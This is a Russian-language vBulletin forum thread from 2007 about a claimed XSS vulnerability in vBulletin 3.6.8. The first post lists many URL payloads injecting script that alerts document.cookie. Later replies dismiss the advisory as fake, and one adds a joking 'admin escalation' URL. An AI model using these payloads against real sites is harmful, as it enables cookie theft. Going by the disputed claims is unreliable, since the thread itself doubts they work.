Здесь скоро опять что то будет...
Your fucking browser doesn't support JavaScript, so you can't post here.
Loading
Объявления
14.08.2007, 14:18
#1
Простоузер
Регистрация: 05.04.2007
Адрес: Томск
Сообщений: 15
Версия vB: 3.6.8
Поблагодарил(-а): 20
Поблагодарили 1 раз в 1 сообщении
Репутация: Новичок (1 )
XSS на vb 3.6.8.
Цитата:
Программа: vBulletin V3.6.8
Уязвимость позволяет удаленному пользователю выполнить XSS нападение на целевую систему. Уязвимость существует из-за недостаточной обработки входных данных во множестве сценариев множеством параметров. Атакующий может выполнить произвольный сценарий в браузере жертвы в контексте безопасности уязвимого сайта.
Пример:
Код:
[site]/[path]/faq.php?s=&do=search&q=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript&match=
all&titlesonly=0
Код:
[site]/[path]/member.php?u=1=s'&do=search&q=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2F
script&match=all&titlesonly=1
Код:
[site]/[path]/index.php?s=<script>alert('document.cookie')</script>
Код:
[site]/[path]/faq.php?s="&do=search&q=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript
&match=all&titlesonly=0
Код:
[site]/[path]/memberlist.php?s="&do=search&q=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2
Fscript&match=all&titlesonly=0
Код:
[site]/[path]/calendar.php?s="&do=search&q=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2F
script&match=all&titlesonly=0
Код:
[site]/[path]/search.php?s="&do=search&q=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript
&match=all&titlesonly=0
Код:
[site]/[path]/search.php?do=getdaily"&do=search&q=%22%3E%3C%2Fscript%3E%3Cscript%3
Ealert%28document.cookie
%29%3B%3C%2Fscript&match=all&titlesonly=0
Код:
[site]/[path]/forumdisplay.php?s="&do=search&q=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript
&match=all&titlesonly=0
Код:
[site]/[path]/forumdisplay.php?do=markread"&do=search&q=%22%3E%3C%2Fscript%3E%3Cscript%3E
alert%28document.cookie
%29%3B%3C%2Fscript&match=all&titlesonly=0
Код:
[site]/[path]/forumdisplay.php?f=1"&do=search&q=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie
%29%3B%3C%2Fscript&match=all&titlesonly=0
Код:
[site]/[path]/showgroups.php?s="&do=search&q=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript&
match=all&titlesonly=0
Код:
[site]/[path]/online.php?s="&do=search&q=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript&
match=all&titlesonly=0
Код:
[site]/[path]/member.php?s="&do=search&q=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2F
script&match=all&titlesonly=0
Код:
[site]/[path]/sendmessage.php?s="&do=search&q=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2F
script&match=all&titlesonly=0
Источник
http://www.securitysib.com/2007/08/14/vbulletin.html
Кто что думает?
Рекламка
Реклама на форуме
Файловый Архив
Неограниченное количество категорий и суб-категорий
Тонкие настройки прав доступа
Предпросмотр медиа файлов: FLV, IFLV, F4A, F4V, MP4, MP3, MOV и других...
Мультизагрузка файлов - SWFUploader
Добавление файлов с сервера
Подробности и история обновлений продукта в
этой теме
14.08.2007, 14:20
#2
Знаток
Регистрация: 29.01.2006
Адрес: Зимбабе...
Сообщений: 614
Поблагодарил(-а): 83
Поблагодарили 112 раз(а) в 78 сообщениях
Репутация: Знаток (104 )
а в 3.6.7 её нету ?
14.08.2007, 14:57
#3
Гуру
Регистрация: 29.08.2005
Адрес: Рiдна Олбанея
Сообщений: 3,773
Версия vB: 3.8.x
Поблагодарил(-а): 39
Поблагодарили 1,119 раз(а) в 787 сообщениях
Репутация: Гуру (1155 )
чето бред какойто
где источник?
14.08.2007, 15:26
#4
Эксперт
Регистрация: 05.01.2006
Адрес: http://www.lisichko.ru
Сообщений: 4,640
Версия vB: 3.6 Beta
Поблагодарил(-а): 619
Поблагодарили 1,616 раз(а) в 924 сообщениях
Репутация: Эксперт (1656 )
Цитата:
Сообщение от
netwind
чето бред какойто
+1
Цитата:
Сообщение от
IchWill
&q=XSS
Такой приметив да в вобле? Я вас умоляю.
Цитата:
Сообщение от
IchWill
u=1=s'&q=XSS
Бред больного поросенка =\
Вообще это из оперы "папа подключил мне инетку и я зашел на античат". Кто-то натыкал в урлы совершенно глупые строчки, не понимая что они вообще делают, и решил выдать это за уязвимость.
14.08.2007, 16:14
#5
zМарковь
Хочет третью строчку =)
Регистрация: Лольск
Адрес: 09.05.2005
Сообщений: 2,787
Версия vB: 6960
Поблагодарил(-а): 691
Поблагодарили 6,745 раз(а) в 969 сообщениях
Репутация: Гуру (3.8.x )
чё думать ) пробуйте и убеждайтесь рабит иль нет )
Цитата:
Сообщение от
IchWill
[site]/[path]/index.php?s=<script>alert('document.cookie')</script>
убило
14.08.2007, 16:19
#6
zМарковь
Хочет третью строчку =)
Регистрация: Лольск
Адрес: 6960
Сообщений: 09.05.2005
Версия vB: 3.8.x
Поблагодарил(-а): 691
Поблагодарили 6,745 раз(а) в 969 сообщениях
Репутация: Гуру (2,787 )
а во я ещё нашёл поднятие прав юзера с userid X до группы админов:
Код:
[site]/[path]/[path2admincp]/init.php?uid=1&sugid=6&suid=X
19.08.2007, 07:57
#7
Простоузер
Регистрация: 01.07.2007
Сообщений: 114
Версия vB: 3.7.2
Поблагодарил(-а): 20
Поблагодарили 2 раз(а) в 2 сообщениях
Репутация: Ламер (-4 )
Ужас
это чо правда???? честно непойму :( на том сайте правда написано,ток незнаю правда ли на 3.6.8 работает
19.08.2007, 14:29
#8
Специалист
Регистрация: 01.09.2006
Сообщений: 1,195
Версия vB: 3.8.x
Поблагодарил(-а): 97
Поблагодарили 324 раз(а) в 218 сообщениях
Репутация: Специалист (468 )
адрес сайта http://www.securitysib.com доверия не внушает.
он скорее похож на один из тысяч блого-сайто-варезо-хреней, типа фишек/зизы/etc
26.08.2007, 18:43
#9
Простоузер
Регистрация: 05.04.2007
Адрес: Томск
Сообщений: 15
Версия vB: 3.6.8
Поблагодарил(-а): 20
Поблагодарили 1 раз в 1 сообщении
Репутация: Новичок (1 )
Цитата:
адрес сайта http://www.securitysib.com доверия не внушает.
он скорее похож на один из тысяч блого-сайто-варезо-хреней, типа фишек/зизы/etc
один из тысяч блого-сайто-варезо-хреней, типа фишек/зизы/etc -
http://securityvulns.ru/Rdocument840.html
и еще один не внушающий доверия сайт
http://www.google.ru/search?q=vBulle...sword+Md5+Hash
26.08.2007, 18:46
#10
zМарковь
Хочет третью строчку =)
Регистрация: Лольск
Адрес: 09.05.2005
Сообщений: 2,787
Версия vB: 3.8.x
Поблагодарил(-а): 691
Поблагодарили 6,745 раз(а) в 969 сообщениях
Репутация: Гуру (6960 )
IchWill , чем больше по инету распространяется fake, тем больше мы видим сайтов, которые не проверяют информацию )
Опции темы
Опции просмотра
Линейный вид
Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения
HTML код Выкл.
Текущее время: 21:44 23.05.2012 . Часовой пояс GMT +4.